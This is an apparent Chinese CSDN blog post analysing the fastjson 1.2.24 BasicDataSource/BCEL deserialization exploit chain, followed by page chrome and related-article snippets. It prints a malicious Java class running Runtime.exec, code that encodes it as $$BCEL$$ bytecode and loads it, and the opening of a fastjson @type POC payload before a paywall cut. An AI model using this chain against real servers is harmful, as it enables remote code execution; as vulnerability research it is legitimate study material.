红队漏洞研究-fastjsonBasicDataSource链分析

最新推荐文章于 2024-06-10 09:38:25 发布
最新推荐文章于 2024-06-10 09:38:25 发布
阅读量1k 收藏
点赞数
文章标签: lsa 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gamma_lab/article/details/123294137
版权

前言

BCEL

BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。

BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

如何利用BCEL进行命令执行

BCEL中有一个类com.sun.org.apache.bcel.internal.util.ClassLoader,是一个ClassLoader,重写了loadClass方法。在ClassLoader#loadClass()中,其会判断类名是否是$$BCEL$$开头,如果是的话,将会对这个字符串进行decode。
在这里插入图片描述

首先编写一个恶意类

package com.darkerbox.bcel;

public class Evil {
   
    static {
   
        try {
   
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {
   
            e.printStackTrace();
        }
    }
}

然后将该类生成为BCEL格式的字节码,使用这个字节码来新建对象,执行命令。

package com.darkerbox.bcel;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

public class BcelTest {
   
  public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
   
      JavaClass cls = Repository.lookupClass(Evil.class);
      String code = Utility.encode(cls.getBytes(),true);
      System.out.println("$$BCEL$$"+code);
      // 加载类并实例化
      new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();
  }
}

我本地使用到的依赖。

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.20</version>
</dependency>

在这里插入图片描述

在fastjson中的利用

先看看POC

package com.darkerbox.bcel;

import com.alibaba.fastjson.JSON;

public class test {
   
  public static void main(String[] args) {
   
    String payload =
        "{\n"
            + "    {\n"
            + "        \"aaa\": {\n"
            + "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"
            + "                \"driverClassLoader\": {\n"
            +
最低0.47元/天 解锁文章
Gamma_lab
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson反序列化 BasicDataSource链分析
Vicl1fe的博客
01-06 834
前言 BCEL BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。 BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-i
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl)
m0_64685672的博客
02-03 2795
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
java反序列化与Apache CC链、fastjson反序列化的理解与研究
Shanfenglan's blog
04-15 1644
文章目录1. 前言2. 为什么会存在序列化技术2. 序列化 1. 前言 java反序列化是将一个序列化文件或者序列化数据进行还原处理。一个被序列化的数据的2进制数据特征是以aced0005开头,有点类似于exe文件都有PE头一样,具体如下所示: 序列化技术的出现,是为了方便数据保存与传输的。它将数据变成了字节的形式进行保存并便于通过socket进行传输。 2. 为什么会存在序列化技术 1、方便对象的保存 2、方便对象在网络上传输 网络上只能传输字节流数据,对象本是无法在网络上直接进行传输的。而序列化技术可
探秘Apache Commons BCEL:强大的字节码工程库
最新发布
gitblog_00092的博客
06-10 379
探秘Apache Commons BCEL:强大的字节码工程库 项目地址:https://gitcode.com/apachecommons-bcel/commons-bcel Apache Commons BCEL(Bytecode Engineering Library)是一个强大的Java字节码操控和分析框架,它提供了创建、修改和分析类文件的能力,是进行动态程序生成、代码分析和优化的得力工具...
Java代码审计——Fastjson TemplatesImpl调用链
王嘟嘟的博客
12-09 2617
0x00 前言 反序列化总纲 除开jdbc调用链,还有一个TemplatesImpl的调用链,这个在CC链中是出现过的。可以参考:调用链 主要的要点在满以下三个变量 _bytecodes _name _tfactory 还有就是调用newTransformer的方法 0x01 调用链 先上poc: final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ParserConfig conf
fastjson-BCEL不出网打法原理分析
weixin_49248030的博客
11-22 3268
与原生的 Java 反序列化的区别在于,FastJson 反序列化并未使用 readObject 方法,而是由 FastJson 自定一套反序列化的过程。通过在反序列化的过程中自动调用类属性的 setter 方法和 getter 方法,将 JSON 字符串还原成对象,当这些自动调用的方法中存在可利用的潜在危险代码时,漏洞便产生了。
【常用工具类】fastjson
整理输出各类知识
11-01 267
在项目种经常要调用第三方的接口获取返回值,返回结果一般都是JSON格式的字符串,需要使用JSON解析工具进行解析,比较常用的就是fastjson。将对象或者集合序列化成JSON字符串。将JSON字符串反序列化为指定对象。将JSON数组的字符串转换为集合。目前感觉这三个在项目中就够用了。
Java安全(十五) 一些链子之C3P0
WDWAGAAFGAGDADSA的博客
07-18 931
C3P0常见
红队渗透打点工具-FindUpload
03-07
这大大减少了测试人员手动查找的时间,使他们能更专注于分析和利用发现的安全漏洞。 2. **快速发现文件上传点**:文件上传功能在很多网站中广泛存在,但如果不妥善管理,往往成为攻击者植入恶意代码的入口。...
goby红队&社区版-win-64-2.4.7
11-27
《Goby红队与社区版:安全扫描与漏洞检测的利器》 在网络安全领域,漏洞扫描和安全测试是至关重要的环节。Goby是一款备受瞩目的工具,它为红队网络安全攻防演练中的攻击方)和社区用户提供了一流的支持。"goby...
goby-红队专用版-for-Windows
12-15
goby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队...
深信服红队检测服务-2页
05-07
先进的攻防装备近百名博士后组成的创新研究院利用 AI、机器学习等技术研发先进的攻击和漏洞挖掘装备,可自动化绕过多种安全防护设备。 红队检测服务提供深信服自研的攻防协作平台,提供深信服红队检测报告,包括...
goby红队-x64-2.4.8(win和linux)
05-16
内涵win-linux goby的安全...一个简洁易用的可视化漏洞扫描界面,使操作者可以更好地进行复杂网络和应用程序的任务分析、漏洞检测及利用。 总体来说,Goby 红队版是一款非常适合红队操作者使用的高效率安全工具,它
【Web】速谈FastJson反序列化中BasicDataSource的利用
uuzeray的博客
03-03 1155
那么我们就可以设置​​driverClassLoader​​​为com.sun.org.apache.bcel.internal.util.ClassLoader​​​,设置​​driverClassName​​为恶意的BCEL格式的字节码,配合BCEL初始化任意恶意对象。}​​​ 这一整段外面再套一层​​{}​​,这样的话会把这个整体当做一个JSONObject,会把这个当做key,值为xxx。key为​​JSONObject​​对象,会调用该对象的toString方法。然后会以字符串的形式输出出来。
关于hessian2的一些疑点(0CTF来分析)
qq_62046696的博客
07-14 448
从SCTF的java题,看到了0CTF的java,发现都是考察hessian2的链子,于是分析了一段时间。发现本地搭建,就算使用师傅们的EXP都打不通,很郁闷,是jdk的原因嘛??//////实例化的类 实例化的超类 构造函数类型 构造函数值。
fastjson BCEL不出网打法
遇事不决冲冲冲
04-30 6493
BasicDataSource 如果目标服务器没有外网、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出网,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
Javaweb安全——Java类加载机制
weixin_43610673的博客
04-01 3204
前言 参照https://javasec.org/以及p神的Java安全漫谈的路线进行学习,类似读书笔记那种吧。之前都是ctf遇到Java的题才学一点,像是反序列化这种,没系统化的学过Java Web安全,这次从头来好好学一遍。 Java平台版本 Java平台共分为三个主要版本Java SE(Java Platform, Standard Edition-Java平台标准版)、Java EE(Java Platform Enterprise Edition-Java平台企业版)、和Java ME(Java
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5436
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2661
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
Python灰帽攻击安全手册:渗透测试与漏洞分析精髓
"python灰帽攻击安全手册_渗透测试与漏洞分析技术.pdf" 这本Python灰帽攻击安全手册主要探讨了渗透测试与漏洞分析技术,旨在教育读者如何在道德范围内进行网络安全评估。书中首先介绍了正义黑客的道德规范,强调在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值